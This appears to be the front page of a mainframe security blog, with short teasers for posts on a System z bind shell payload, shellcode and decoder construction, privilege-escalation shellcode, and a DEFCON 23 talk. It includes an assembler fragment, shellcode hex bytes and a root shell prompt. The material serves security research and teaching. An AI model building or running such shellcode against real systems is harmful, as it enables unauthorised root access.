Mainframe Bind Shell – Source Code

Key in any basic toolset for pentesting the mainframe platform is a selection of payloads that can be used to test vulnerabilities. Below is a bind shell payload, written from scratch in mainframe assembler. The shell can be connected to using netcat. The payload differs from its Intel counterparts, in that it contains its own EBCDIC to ASCII…

Building shellcode, egghunters and decoders.

Creating shellcode on System Z (Mainframe) Unix System Services (USS) employs the same disciplines required for the same activities on Intel platforms. The difference lies in the syntax, assembler mnemonics, tools available, and debugging utilities. There are certainly other ways to achieve this, and I’m still refining my favorites. The below is one of my…

Shellcode Freebie!

Got a burning privesc vulnerable binary on your USS? How about feeding it a little self-decoding shellcode? (Hint: this is fully functional, find a C stub and try it yourself!)

Tips / Tricks – 7/2/15 (update)

Updated. Added update to the packet capture section below, included pcap export! ISPF editor: Want more real estate in your ISPF editor? In an editing session enter EDSET in the command line, then check the line marked: "X Remove action bars in ISPF edit and view panels". This will remove the menu bars and…

Mainframe shellcode

Come see my talk at DEFCON23.

    …
    SLR   14,14
    MVC   32(4,13),16(14)
    L     14,32(,13)
    …
    \x1f\xee
    \xd2\x03\xd0\x20\xe0\x10
    \x58\xe0\xd0\x20
    …
    # id
    uid=0(IBMUSER) gid=0(SYS1)
    …

Stay tuned to this site and follow @bigendiansmalls for sneak peeks at what I will be presenting!

Adventures in securing a “dinosaur”

This blog is my own chronicle of adventures in writing exploits, cryptography, security and who knows what else. Specifically though, I’m going to start by sharing technical specifics to support my upcoming co-talk at Defcon 23. Our talk titled “Security Necromancy: Further Adventures in Mainframe Hacking” seeks to educate the security community to actively dig…